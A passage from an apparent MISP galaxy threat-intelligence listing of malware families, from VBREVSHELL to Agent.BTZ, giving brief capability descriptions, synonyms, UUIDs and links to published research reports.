in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/vbs.unidentified_006 - webarchive
- https://blogs.blackberry.com/en/2023/01/gamaredon-abuses-telegram-to-target-ukrainian-organizations - webarchive
- https://threatmon.io/beyond-bullets-and-bombs-an-examination-of-armageddon-groups-cyber-warfare-against-ukraine/ - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
VBREVSHELL
According to Mandiant, VBREVSHELL is a VBA macro that spawns a reverse shell relying exclusively on Windows API calls.
Internal MISP references
UUID 991179a0-efd5-450a-a1ce-78d1109bb50b
which can be used as unique global reference for VBREVSHELL
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
WasabiSeed
Internal MISP references
UUID 0c6568da-7017-4d9f-b077-0c486b3f9057
which can be used as unique global reference for WasabiSeed
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
WhiteShadow
Internal MISP references
UUID dc857b7d-f228-4aa5-9e89-f7e17bb7ea8c
which can be used as unique global reference for WhiteShadow
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
000Stealer
Internal MISP references
UUID 24e598cf-4c55-468a-ac1d-cc4f89104943
which can be used as unique global reference for 000Stealer
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
0bj3ctivityStealer
Information stealer; based on its strings it appears to target cryptocurrency wallets, instant messengers and browser data.
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular 0bj3ctivityStealer.
Known Synonyms |
---|
PXRECVOWEIWOEI |
Internal MISP references
UUID ac22ee6f-0d15-4edb-8ea5-1675df57597c
which can be used as unique global reference for 0bj3ctivityStealer
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
3CX Backdoor (Windows)
According to CrowdStrike, this backdoor was discovered being embedded in a legitimate, signed version of 3CXDesktopApp, and thus constitutes a supply chain attack.
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular 3CX Backdoor (Windows).
Known Synonyms |
---|
SUDDENICON |
Internal MISP references
UUID b6a00e25-9d8d-4ebc-b9fc-7fd41797303b
which can be used as unique global reference for 3CX Backdoor (Windows)
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/win.3cx_backdoor - webarchive
- https://www.fortinet.com/blog/threat-research/3cx-desktop-app-compromised - webarchive
- https://www.elastic.co/security-labs/elastic-users-protected-from-suddenicon-supply-chain-attack - webarchive
- https://www.splunk.com/en_us/blog/security/splunk-insights-investigating-the-3cxdesktopapp-supply-chain-compromise.html - webarchive
- https://www.zscaler.com/security-research/3CX-supply-chain-attack-analysis-march-2023 - webarchive
- https://github.com/dodo-sec/Malware-Analysis/blob/main/SmoothOperator/SmoothOperator.md - webarchive
- https://www.sentinelone.com/blog/smoothoperator-ongoing-campaign-trojanizes-3cx-software-in-software-supply-chain-attack/ - webarchive
- https://www.volexity.com/blog/2023/03/30/3cx-supply-chain-compromise-leads-to-iconic-incident/ - webarchive
- https://securelist.com/it-threat-evolution-q2-2023/110355/ - webarchive
- https://blogs.blackberry.com/en/2023/03/initial-implants-and-network-analysis-suggest-the-3cx-supply-chain-operation-goes-back-to-fall-2022 - webarchive
- https://www.reddit.com/r/crowdstrike/comments/125r3uu/20230329_situational_awareness_crowdstrike/ - webarchive
- https://www.group-ib.com/blog/3cx-supply-chain-attack/?utm_source=twitter&utm_campaign=3cx-blog&utm_medium=social - webarchive
- https://www.youtube.com/watch?v=fTX-vgSEfjk - webarchive
- https://www.virusbulletin.com/uploads/pdf/conference/vb2023/papers/Lazarus-campaigns-and-backdoors-in-2022-2023.pdf - webarchive
- https://www.huntress.com/blog/3cx-voip-software-compromise-supply-chain-threats - webarchive
- https://www.cadosecurity.com/forensic-triage-of-a-windows-system-running-the-backdoored-3cx-desktop-app/ - webarchive
- https://research.openanalysis.net/3cx/northkorea/apt/triage/2023/03/30/3cx-malware.html#Functionality - webarchive
- https://www.welivesecurity.com/2023/04/20/linux-malware-strengthens-links-lazarus-3cx-supply-chain-attack - webarchive
- https://blogs.vmware.com/security/2023/03/investigating-3cx-desktop-application-attacks-what-you-need-to-know.html - webarchive
- https://www.rapid7.com/blog/post/2023/03/30/backdoored-3cxdesktopapp-installer-used-in-active-threat-campaign/ - webarchive
- https://www.trendmicro.com/en_us/research/23/c/information-on-attacks-involving-3cx-desktop-app.html - webarchive
- https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/3cx-supply-chain-attack - webarchive
- https://blog.cyble.com/2023/03/31/a-comprehensive-analysis-of-the-3cx-attack - webarchive
- https://www.crowdstrike.com/blog/crowdstrike-detects-and-prevents-active-intrusion-campaign-targeting-3cxdesktopapp-customers/ - webarchive
- https://www.reversinglabs.com/blog/red-flags-fly-over-supply-chain-compromised-3cx-update - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
404 Keylogger
Snake Keylogger (aka 404 Keylogger) is a subscription-based keylogger that has many capabilities. The infostealer can steal a victim’s sensitive information, log keyboard strokes, take screenshots and extract information from the system clipboard. It was initially released on a Russian hacking forum in August 2019. It is notable for its relatively unusual methods of data exfiltration, including via email, FTP, SMTP, Pastebin or the messaging app Telegram.
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular 404 Keylogger.
Known Synonyms |
---|
404KeyLogger |
Snake Keylogger |
Internal MISP references
UUID 6b87fada-86b3-449d-826d-a89858121b68
which can be used as unique global reference for 404 Keylogger
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/win.404keylogger - webarchive
- https://twitter.com/James_inthe_box/status/1401921257109561353 - webarchive
- https://insights.infoblox.com/threat-intelligence-reports/threat-intelligence--89 - webarchive
- https://www.fortinet.com/blog/threat-research/deep-dive-into-a-fresh-variant-of-snake-keylogger-malware - webarchive
- https://securityintelligence.com/x-force/spam-trends-campaigns-senior-superlatives-2023/ - webarchive
- https://any.run/cybersecurity-blog/analyzing-snake-keylogger/ - webarchive
- https://blog.nviso.eu/2022/04/06/analyzing-a-multilayer-maldoc-a-beginners-guide/ - webarchive
- https://x-junior.github.io/malware%20analysis/2022/06/24/Snakekeylogger.html - webarchive
- https://blog.netlab.360.com/purecrypter - webarchive
- https://securityintelligence.com/posts/roboski-global-recovery-automation/ - webarchive
- https://malwarebookreports.com/cross-platform-java-dropper-snake-and-xloader-mac-version/ - webarchive
- https://www.cybereason.com/blog/threat-analysis-report-snake-infostealer-malware - webarchive
- https://www.malwarebytes.com/blog/threat-intelligence/2022/20221121-threat-intel-report-final.pdf - webarchive
- https://www.bitsight.com/blog/exfiltration-over-telegram-bots-skidding-infostealer-logs - webarchive
- https://www.ciphertechsolutions.com/roboski-global-recovery-automation/ - webarchive
- https://www.zscaler.com/blogs/security-research/technical-analysis-purecrypter - webarchive
- https://threatresearch.ext.hp.com/the-many-skins-of-snake-keylogger/ - webarchive
- https://threatresearch.ext.hp.com/pdf-malware-is-not-yet-dead/ - webarchive
- https://any.run/cybersecurity-blog/reverse-engineering-snake-keylogger/ - webarchive
- https://www.bleepingcomputer.com/news/security/pdf-smuggles-microsoft-word-doc-to-drop-snake-keylogger-malware/ - webarchive
- https://blogs.blackberry.com/en/2022/05/dot-net-stubs-sowing-the-seeds-of-discord - webarchive
- https://cert.gov.ua/article/955924 - webarchive
- https://www.youtube.com/watch?v=vzyJp2w8bPE - webarchive
- https://www.ptsecurity.com/ww-en/analytics/pt-esc-threat-intelligence/steganoamor-campaign-ta558-mass-attacking-companies-and-public-institutions-all-around-the-world/ - webarchive
- https://habr.com/ru/company/group-ib/blog/477198/ - webarchive
- https://blogs.blackberry.com/en/2022/06/threat-thursday-unique-delivery-method-for-snake-keylogger - webarchive
- https://insights.infoblox.com/threat-intelligence-reports/threat-intelligence--102 - webarchive
- https://zw01f.github.io/malware%20analysis/snake/ - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
4h_rat
Internal MISP references
UUID 823f4eb9-ad37-4fab-8e69-3bdae47a0028
which can be used as unique global reference for 4h_rat
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/win.4h_rat - webarchive
- https://attack.mitre.org/groups/G0024 - webarchive
- https://cocomelonc.github.io/malware/2023/09/25/malware-trick-36.html - webarchive
- https://cocomelonc.github.io/tutorial/2021/09/04/simple-malware-av-evasion.html - webarchive
- https://github.com/securitykitten/malware_references/blob/master/crowdstrike-intelligence-report-putter-panda.original.pdf - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
5.t Downloader
Downloader used in suspected APT attack against Vietnam.
Internal MISP references
UUID 685c9c30-aa9f-43ee-a262-43c17c350049
which can be used as unique global reference for 5.t Downloader
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/win.5t_downloader - webarchive
- https://kienmanowar.wordpress.com/2022/01/26/quicknote-analysis-of-malware-suspected-to-be-an-apt-attack-targeting-vietnam/ - webarchive
- https://blog.vincss.net/re022-part-1-quick-analysis-of-malicious-sample-forging-the-official-dispatch-of-the-central-inspection-committee/ - webarchive
- https://research.checkpoint.com/2024/sharp-dragon-expands-towards-africa-and-the-caribbean/ - webarchive
- https://blog.checkpoint.com/research/chinese-espionage-campaign-expands-to-target-africa-and-the-caribbean/ - webarchive
- https://research.checkpoint.com/2023/pandas-with-a-soul-chinese-espionage-attacks-against-southeast-asian-government-entities/ - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
7ev3n
The NJCCIC describes 7ev3n as a ransomware "that targets the Windows OS and spreads via spam emails containing malicious attachments, as well as file sharing networks. It installs multiple files in the LocalAppData folder, each of which controls different functions including disabling bootup recovery options, deleting the ransomware installation file, encrypting data, and gaining administrator privileges. This variant also adds registry keys that disable various Windows function keys such as F1, F3, F4, F10, Alt, Num Lock, Ctrl, Enter, Escape, Shift, and Tab. Files encrypted by 7ev3n are labeled with a .R5A extension. It also locks victims out of Windows recovery options, making it challenging to repair the damage done by 7ev3n."
Internal MISP references
UUID ac2608e9-7851-409f-b842-e265b877a53c
which can be used as unique global reference for 7ev3n
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
8Base
The 8Base ransomware group has remained relatively unknown despite a massive spike in activity in the summer of 2023. The group pairs encryption with "name-and-shame" techniques to compel victims to pay. 8Base compromises targets opportunistically, with recent victims spanning varied industries. Despite the high number of compromises, the identities, methodology and underlying motivation behind these incidents remain unclear. Samples of their ransomware show they are using a customized Phobos delivered with SmokeLoader.
Internal MISP references
UUID 7ee60640-29cd-4127-b805-1f2b753e9e15
which can be used as unique global reference for 8Base
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/win.8base - webarchive
- https://krebsonsecurity.com/2023/09/whos-behind-the-8base-ransomware-website/ - webarchive
- https://socradar.io/dark-web-profile-8base-ransomware/ - webarchive
- https://blog.bushidotoken.net/2023/05/unmasking-ransomware-using-stylometric.html - webarchive
- https://www.logpoint.com/en/blog/emerging-threat/defending-against-8base/ - webarchive
- https://blog.talosintelligence.com/deep-dive-into-phobos-ransomware/ - webarchive
- https://blogs.vmware.com/security/2023/06/8base-ransomware-a-heavy-hitting-player.html - webarchive
- https://twitter.com/rivitna2/status/1674718854549831681 - webarchive
- https://blog.talosintelligence.com/talos-ir-q2-2023-quarterly-recap/ - webarchive
- https://blog.sekoia.io/sekoia-io-mid-2023-ransomware-threat-landscape - webarchive
- https://circleid.com/posts/20240530-a-dns-investigation-of-the-phobos-ransomware-8base-attack - webarchive
- https://www.acronis.com/en-sg/cyber-protection-center/posts/8base-ransomware-stays-unseen-for-a-year/ - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
8.t Dropper
8T_Dropper has been used by the Chinese threat actor TA428 to install Cotx RAT onto victims' machines during Operation LagTime IT. According to Proofpoint, the attack targeted a number of government agencies in East Asia overseeing government information technology, domestic affairs, foreign affairs, economic development, and political processes. The dropper was delivered through an RTF document exploiting CVE-2018-0798.
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular 8.t Dropper.
Known Synonyms |
---|
8t_dropper |
RoyalRoad |
Internal MISP references
UUID df755d5f-db11-417d-8fed-b7abdc826590
which can be used as unique global reference for 8.t Dropper
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/win.8t_dropper - webarchive
- https://nao-sec.org/2021/01/royal-road-redive.html - webarchive
- https://blog.malwarelab.pl/posts/on_the_royal_road/ - webarchive
- https://medium.com/@Sebdraven/new-version-of-chinoxy-backdoor-using-covid19-document-lure-83fa294c0746 - webarchive
- https://research.checkpoint.com/2023/pandas-with-a-soul-chinese-espionage-attacks-against-southeast-asian-government-entities/ - webarchive
- https://research.checkpoint.com/2019/rancor-the-year-of-the-phish/ - webarchive
- https://tradahacking.vn/another-malicious-document-with-cve-2017-11882-839e9c0bbf2f - webarchive
- https://www.virusbulletin.com/virusbulletin/2020/03/vb2019-paper-attribution-object-using-rtf-object-dimensions-track-apt-phishing-weaponizers/ - webarchive
- https://cdn-cybersecurity.att.com/docs/global-perspective-of-the-sidewinder-apt.pdf - webarchive
- https://malgamy.github.io/malware-analysis/The-Approach-of-TA413-for-Tibetan-Targets/#third-stage - webarchive
- https://go.recordedfuture.com/hubfs/reports/cta-2022-0922.pdf - webarchive
- https://community.riskiq.com/article/56fa1b2f - webarchive
- https://www.accenture.com/_acnmedia/pdf-96/accenture-security-mudcarp.pdf - webarchive
- https://tradahacking.vn/l%C3%A0-1937cn-hay-oceanlotus-hay-lazarus-6ca15fe1b241 - webarchive
- https://vb2020.vblocalhost.com/uploads/VB2020-20.pdf - webarchive
- https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2020CrowdStrikeGlobalThreatReport.pdf - webarchive
- https://www.pwc.co.uk/cyber-security/pdf/pwc-cyber-threats-2020-a-year-in-retrospect.pdf - webarchive
- https://medium.com/@Ilandu/portdoor-malware-afc9d0796cba - webarchive
- https://community.riskiq.com/article/5fe2da7f - webarchive
- https://medium.com/@Sebdraven/malicious-document-targets-vietnamese-officials-acb3b9d8b80a? - webarchive
- https://research.checkpoint.com/2020/vicious-panda-the-covid-campaign - webarchive
- https://ics-cert.kaspersky.com/media/Kaspersky-ICS-CERT-APT-attacks-on-industrial-organizations-in-H1-2021-En.pdf - webarchive
- https://research.checkpoint.com/2020/vicious-panda-the-covid-campaign/ - webarchive
- https://www.sentinelone.com/labs/targets-of-interest-russian-organizations-increasingly-under-attack-by-chinese-apts/ - webarchive
- https://securelist.com/cycldek-bridging-the-air-gap/97157/ - webarchive
- https://www.proofpoint.com/us/threat-insight/post/chinese-apt-operation-lagtime-it-targets-government-information-technology - webarchive
- https://medium.com/@Sebdraven/malicious-document-targets-vietnamese-officials-acb3b9d8b80a - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
9002 RAT
9002 RAT is a Remote Access Tool typically observed being used by an APT to control a victim's machine. It has been spread via zero-day exploits (e.g. targeting Internet Explorer) as well as via email attachments. The infection chain starts by opening a .LNK (an OLE packager shell object) that executes a PowerShell command.
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular 9002 RAT.
Known Synonyms |
---|
HOMEUNIX |
Hydraq |
McRAT |
Internal MISP references
UUID bab647d7-c9d6-4697-8fd2-1295c7429e1f
which can be used as unique global reference for 9002 RAT
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/win.9002 - webarchive
- https://blog.trendmicro.com/trendlabs-security-intelligence/supply-chain-attack-operation-red-signature-targets-south-korean-organizations/ - webarchive
- https://www.infopoint-security.de/medien/the-elderwood-project.pdf - webarchive
- https://www-west.symantec.com/content/dam/symantec/docs/security-center/white-papers/elderwood-project-12-en.pdf - webarchive
- https://www.fireeye.com/blog/threat-research/2013/02/lady-boyle-comes-to-town-with-a-new-exploit.html - webarchive
- https://researchcenter.paloaltonetworks.com/2015/09/chinese-actors-use-3102-malware-in-attacks-on-us-government-and-eu-media/ - webarchive
- https://www.crysys.hu/publications/files/tedi/ukatemicrysys_territorialdispute.pdf - webarchive
- https://www.secureworks.com/research/threat-profiles/bronze-union - webarchive
- https://www.secureworks.com/research/threat-profiles/bronze-express - webarchive
- https://paper.seebug.org/papers/APT/APT_CyberCriminal_Campagin/2013/hidden_lynx.pdf - webarchive
- https://attack.mitre.org/groups/G0001/ - webarchive
- https://www.trendmicro.com/en_my/research/18/h/supply-chain-attack-operation-red-signature-targets-south-korean-organizations.html - webarchive
- https://www.tgsoft.it/news/news_archivio.asp?id=1557&lang=eng - webarchive
- https://www.secureworks.com/research/threat-profiles/bronze-firestone - webarchive
- https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/webworm-espionage-rats - webarchive
- https://www.proofpoint.com/us/threat-insight/post/operation-rat-cook-chinese-apt-actors-use-fake-game-thrones-leaks-lures - webarchive
- https://www.fireeye.com/blog/threat-research/2013/05/ready-for-summer-the-sunshop-campaign.html - webarchive
- http://researchcenter.paloaltonetworks.com/2016/07/unit-42-attack-delivers-9002-trojan-through-google-drive/ - webarchive
- https://www.youtube.com/watch?v=-7Swd1ZetiQ - webarchive
- https://app.box.com/s/z1uanuv1vn3vw5iket1r6bqrmlra0gpn - webarchive
- https://www.secureworks.com/research/threat-profiles/bronze-keystone - webarchive
- https://www.fireeye.com/blog/threat-research/2013/11/operation-ephemeral-hydra-ie-zero-day-linked-to-deputydog-uses-diskless-method.html - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Abaddon
Uses Discord for C&C and has a ransomware feature.
Internal MISP references
UUID 97be2d1a-878d-46bd-8ee7-d8798ec61ef1
which can be used as unique global reference for Abaddon
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
AbaddonPOS
MajorGeeks describes this malware as trying to locate credit card data by reading the memory of all processes except itself by first blacklisting its own PID using the GetCurrentProcessId API. Once that data is discovered, it sends this data back to a command and control server using a custom binary protocol instead of HTTP.
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular AbaddonPOS.
Known Synonyms |
---|
PinkKite |
TinyPOS |
Internal MISP references
UUID a492a3e0-13cb-4b7d-93c1-027e7e69b44d
which can be used as unique global reference for AbaddonPOS
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/win.abaddon_pos - webarchive
- https://www.carbonblack.com/2020/05/21/tau-technical-report-new-attack-combines-tinypos-with-living-off-the-land-techniques-for-scraping-credit-card-data/ - webarchive
- https://norfolkinfosec.com/tinypos-and-prolocker-an-odd-relationship/ - webarchive
- https://threatpost.com/new-pos-malware-pinkkite-takes-flight/130428/ - webarchive
- https://medium.com/s2wlab/operation-synctrek-e5013df8d167 - webarchive
- https://www.proofpoint.com/us/threat-insight/post/AbaddonPOS-A-New-Point-Of-Sale-Threat-Linked-To-Vawtrak - webarchive
- https://www.proofpoint.com/us/threat-insight/post/abaddonpos-now-targeting-specific-pos-software - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
abantes
Internal MISP references
UUID 27b54000-26b5-405f-9296-9fbc9217a8c9
which can be used as unique global reference for abantes
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Abbath Banker
Internal MISP references
UUID e46262cd-961f-4c7d-8976-0d35a066ab83
which can be used as unique global reference for Abbath Banker
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
ABCsync
Internal MISP references
UUID 1e6afd04-d7d1-43a0-9ca5-082d418bd397
which can be used as unique global reference for ABCsync
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
AbSent Loader
Internal MISP references
UUID 532d67fc-0c93-4345-80c4-0c1657056d5e
which can be used as unique global reference for AbSent Loader
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
ACBackdoor (Windows)
A Linux backdoor that was apparently ported to Windows. This entry represents the Windows version. It appears the Linux version was written first and the Windows version was ported later, without full functionality. The Linux version offers persistence as well as some process manipulation techniques, though both versions apparently offer the ability to access the command line and execute programs as well as self-update.
Internal MISP references
UUID 9aa1a516-bd88-4038-a37d-cf66c607e68c
which can be used as unique global reference for ACBackdoor (Windows)
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
ACEHASH
ACEHASH is described by FireEye as a combined credential harvester that consists of two components, a loader and an encrypted/compressed payload. To execute, a password is necessary (e.g. 9839D7F1A0) and the individual modules are addressed with parameters (-m, -w, -h).
Internal MISP references
UUID 51f8c94a-572f-450b-a52f-d3da96302d6b
which can be used as unique global reference for ACEHASH
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/win.acehash - webarchive
- https://www.fireeye.com/blog/threat-research/2019/08/game-over-detecting-and-stopping-an-apt41-operation.html - webarchive
- https://www.welivesecurity.com/2020/05/21/no-game-over-winnti-group/ - webarchive
- https://summit.fireeye.com/content/dam/fireeye-www/summit/cds-2019/presentations/cds19-executive-s08-achievement-unlocked.pdf - webarchive
- https://www.secureworks.com/research/threat-profiles/bronze-atlas - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
AcidBox
Unit42 found AcidBox in February 2019 and describes it as a malware family used by an unknown threat actor in 2017 against Russian entities, as stated by Dr.Web. It reused and improved an exploit for VirtualBox previously used by Turla. The malware itself is a modular toolkit, featuring both usermode and kernelmode components and anti-analysis techniques such as stack-based string obfuscation or dynamic XOR-encoded API usage.
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular AcidBox.
Known Synonyms |
---|
MagicScroll |
Internal MISP references
UUID 4ccc1ec4-6008-4788-95d9-248749f5a7fe
which can be used as unique global reference for AcidBox
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/win.acidbox - webarchive
- https://www.epicturla.com/blog/acidbox-clustering - webarchive
- https://securelist.com/apt-trends-report-q2-2020/97937/ - webarchive
- https://unit42.paloaltonetworks.com/acidbox-rare-malware/ - webarchive
- https://blog.talosintelligence.com/2020/08/attribution-puzzle.html - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
AcridRain
AcridRain is a password stealer written in C/C++. This malware can steal credentials, cookies and credit card data from multiple browsers. It can also dump Telegram and Steam sessions, steal FileZilla's recent connections, and more.
Internal MISP references
UUID ffc368a5-2cd0-44ca-869b-223fdb462c41
which can be used as unique global reference for AcridRain
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Acronym
Internal MISP references
UUID bee73d0f-8ff3-44ba-91dc-d883884c754e
which can be used as unique global reference for Acronym
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
ACR Stealer
First introduced in March 2024, ACR Stealer is an information stealer sold as a Malware-as-a-Service (MaaS) on Russian-speaking cybercrime forums by a threat actor named "SheldIO". Researchers posit that this malware is an evolved version of the GrMsk Stealer, which likely aligns with the private stealer that SheldIO has been selling since July 2023. The malware, written in C++, is compatible with Windows 7 through 10, and the seller manages all command and control (C2) infrastructure. ACR Stealer can harvest system information, stored credentials, web browser cookies, cryptocurrency wallets, and configuration files for various programs. Additionally, it employs the dead drop resolver (DDR) technique to obfuscate the actual C2 infrastructure.
Internal MISP references
UUID 9d80476e-7121-4eeb-a39f-689d8eb872ab
which can be used as unique global reference for ACR Stealer
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/win.acr_stealer - webarchive
- https://twitter.com/sekoia_io/status/1784943443157930449 - webarchive
- https://cyble.com/blog/double-trouble-latrodectus-and-acr-stealer-observed-spreading-via-google-authenticator-phishing-site/ - webarchive
- https://www.fortinet.com/blog/threat-research/exploiting-cve-2024-21412-stealer-campaign-unleashed - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Action RAT
Internal MISP references
UUID 57df4c54-3fff-49dd-9657-19265a66f5de
which can be used as unique global reference for Action RAT
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/win.action_rat - webarchive
- https://www.seqrite.com/blog/double-action-triple-infection-and-a-new-rat-sidecopys-persistent-targeting-of-indian-defence - webarchive
- https://threatmon.io/unraveling-the-complex-infection-chain-analysis-of-the-sidecopy-apts-attack-report/ - webarchive
- https://www.seqrite.com/blog/umbrella-of-pakistani-threats-converging-tactics-of-cyber-operations-targeting-india/ - webarchive
- https://www.seqrite.com/blog/sidecopys-multi-platform-onslaught-leveraging-winrar-zero-day-and-linux-variant-of-ares-rat/ - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Adamantium Thief
Internal MISP references
UUID 28e01527-dbb5-4331-b5bf-5658ebf58297
which can be used as unique global reference for Adamantium Thief
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
AdamLocker
Adam Locker (detected as RANSOM_ADAMLOCK.A) is a ransomware that encrypts targeted files on a victim’s system but offers them a free decryption key which can be accessed through Adf.ly, a URL shortening and advertising service.
Internal MISP references
UUID 1ed36f9a-ae00-4d16-bbf7-e97217385fb1
which can be used as unique global reference for AdamLocker
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Adhubllka
Ransomware distributed by TA547 in Australia.
Internal MISP references
UUID ebf31d45-922a-42ad-b326-8a72ba6dead7
which can be used as unique global reference for Adhubllka
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
AdKoob
Internal MISP references
UUID ace3cb99-3523-44a1-92cc-9f002cf364bf
which can be used as unique global reference for AdKoob
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
AdvisorsBot
AdvisorsBot is a downloader named after early command and control domains that all contained the word "advisors". The malware is written in C and employs a number of anti-analysis features such as junk code, stack strings and Windows API function hashing.
Internal MISP references
UUID e3f49ec0-614e-4070-a620-5196d45df7b5
which can be used as unique global reference for AdvisorsBot
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Adylkuzz
Internal MISP references
UUID 3d6c3ed5-804d-4d0b-8a01-68bc54ae8c58
which can be used as unique global reference for Adylkuzz
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
AESRT
Ransomware written using .NET.
Internal MISP references
UUID fb0eb7a8-ab32-4371-96b7-2d19f9064ac5
which can be used as unique global reference for AESRT
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Afrodita
Internal MISP references
UUID 4c9f8ad2-ace4-42e5-ab70-efdfaad4d1bd
which can be used as unique global reference for Afrodita
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/win.afrodita - webarchive
- https://twitter.com/CPResearch/status/1201957880909484033 - webarchive
- https://github.com/albertzsigovits/malware-notes/blob/master/Afrodita.md - webarchive
- https://dissectingmalwa.re/not-so-nice-after-all-afrodita-ransomware.html - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
AgendaCrypt
Ransomware written in Go.
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular AgendaCrypt.
Known Synonyms |
---|
Agenda |
Qilin |
Internal MISP references
UUID d430e861-07d3-442a-8444-0bf87e660c26
which can be used as unique global reference for AgendaCrypt
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/win.agendacrypt - webarchive
- https://www.sentinelone.com/labs/crimeware-trends-ransomware-developers-turn-to-intermittent-encryption-to-evade-detection/ - webarchive
- https://www.trendmicro.com/en_us/research/22/l/agenda-ransomware-uses-rust-to-target-more-vital-industries.html - webarchive
- https://query.prod.cms.rt.microsoft.com/cms/api/am/binary/RE54L7v - webarchive
- https://www.trendmicro.com/en_us/research/22/h/new-golang-ransomware-agenda-customizes-attacks.html - webarchive
- https://www.trendmicro.com/content/dam/trendmicro/global/en/research/22/h/new-golang-ransomware-agenda-customizes-attacks/IOCs-blog-New%20Golang%20Ransomware%20Agenda%20Customizes%20Attacks.txt - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Agent.BTZ
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular Agent.BTZ.
Known Synonyms |
---|
ComRAT |
Minit |
Sun rootkit |
Internal MISP references
UUID d9cc15f7-0880-4ae4-8df4-87c58338d6b8
which can be used as unique global reference for Agent.BTZ
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/win.agent_btz - webarchive
- https://securelist.com/shedding-skin-turlas-fresh-faces/88069/ - webarchive
- https://www.ironnet.com/blog/russian-cyber-attack-campaigns-and-actors - webarchive
- http://blog.threatexpert.com/2008/11/agentbtz-threat-that-hit-pentagon.html - webarchive
- http://www.intezer.com/new-variants-of-agent-btz-comrat-found/ - webarchive
- https://www.welivesecurity.com/wp-content/uploads/2021/12/eset_jumping_the_air_gap_wp.pdf - webarchive
- https://www.crysys.hu/publications/files/tedi/ukatemicrysys_territorialdispute.pdf - webarchive
- https://www.welivesecurity.com/wp-content/uploads/2020/07/ESET_Threat_Report_Q22020.pdf - webarchive
- https://us-cert.cisa.gov/ncas/analysis-reports/ar20-303a - webarchive
